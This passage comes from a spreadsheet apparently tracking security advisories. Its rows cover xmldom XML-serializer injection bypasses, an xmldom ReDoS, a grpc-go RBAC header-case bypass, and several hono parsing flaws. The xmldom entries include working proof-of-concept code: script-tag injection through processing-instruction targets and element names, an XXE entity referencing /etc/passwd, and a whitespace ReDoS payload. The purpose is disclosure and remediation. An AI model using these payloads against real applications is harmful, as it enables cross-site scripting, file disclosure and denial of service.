Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="1626"><c r="A1626" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1626" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D1626" s="5" t="inlineStr" /><c r="E1626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1626" s="5" t="inlineStr" /><c r="H1626" s="5" t="n"><v>0.003</v></c><c r="I1626" s="5" t="inlineStr" /><c r="J1626" s="5" t="inlineStr" /><c r="K1626" s="5" t="inlineStr" /><c r="L1626" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1626" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1626" s="5" t="inlineStr" /><c r="R1626" s="5" t="inlineStr" /><c r="S1626" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T1626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="1627"><c r="A1627" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1627" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D1627" s="5" t="inlineStr" /><c r="E1627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1627" s="5" t="inlineStr" /><c r="H1627" s="5" t="n"><v>0.003</v></c><c r="I1627" s="5" t="inlineStr" /><c r="J1627" s="5" t="inlineStr" /><c r="K1627" s="5" t="inlineStr" /><c r="L1627" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1627" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1627" s="5" t="inlineStr" /><c r="R1627" s="5" t="inlineStr" /><c r="S1627" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T1627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="1628"><c r="A1628" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1628" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D1628" s="5" t="inlineStr" /><c r="E1628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1628" s="5" t="inlineStr" /><c r="H1628" s="5" t="n"><v>0.003</v></c><c r="I1628" s="5" t="inlineStr" /><c r="J1628" s="5" t="inlineStr" /><c r="K1628" s="5" t="inlineStr" /><c r="L1628" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1628" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1628" s="5" t="inlineStr" /><c r="R1628" s="5" t="inlineStr" /><c r="S1628" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T1628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="1629"><c r="A1629" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1629" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D1629" s="5" t="inlineStr" /><c r="E1629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1629" s="5" t="inlineStr" /><c r="H1629" s="5" t="n"><v>0.003</v></c><c r="I1629" s="5" t="inlineStr" /><c r="J1629" s="5" t="inlineStr" /><c r="K1629" s="5" t="inlineStr" /><c r="L1629" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1629" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1629" s="5" t="inlineStr" /><c r="R1629" s="5" t="inlineStr" /><c r="S1629" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.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1629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="1630"><c r="A1630" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1630" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D1630" s="5" t="inlineStr" /><c r="E1630" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1630" s="5" t="inlineStr" /><c r="H1630" s="5" t="n"><v>0.003</v></c><c r="I1630" s="5" t="inlineStr" /><c r="J1630" s="5" t="inlineStr" /><c r="K1630" s="5" t="inlineStr" /><c r="L1630" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1630" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1630" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1630" s="5" t="inlineStr" /><c r="R1630" s="5" t="inlineStr" /><c r="S1630" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T1630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="1631"><c r="A1631" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1631" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D1631" s="5" t="inlineStr" /><c r="E1631" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1631" s="5" t="inlineStr" /><c r="H1631" s="5" t="n"><v>0.003</v></c><c r="I1631" s="5" t="inlineStr" /><c r="J1631" s="5" t="inlineStr" /><c r="K1631" s="5" t="inlineStr" /><c r="L1631" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1631" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1631" s="5" t="inlineStr" /><c r="R1631" s="5" t="inlineStr" /><c r="S1631" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T1631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="1632"><c r="A1632" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1632" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D1632" s="5" t="inlineStr" /><c r="E1632" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1632" s="5" t="inlineStr" /><c r="H1632" s="5" t="n"><v>0.004</v></c><c r="I1632" s="5" t="inlineStr" /><c r="J1632" s="5" t="inlineStr" /><c r="K1632" s="5" t="inlineStr" /><c r="L1632" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1632" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1632" s="5" t="inlineStr" /><c r="R1632" s="5" t="inlineStr" /><c r="S1632" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T1632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="1633"><c r="A1633" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1633" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D1633" s="5" t="inlineStr" /><c r="E1633" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1633" s="5" t="inlineStr" /><c r="H1633" s="5" t="n"><v>0.003</v></c><c r="I1633" s="5" t="inlineStr" /><c r="J1633" s="5" t="inlineStr" /><c r="K1633" s="5" t="inlineStr" /><c r="L1633" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1633" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1633" s="5" t="inlineStr" /><c r="R1633" s="5" t="inlineStr" /><c r="S1633" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

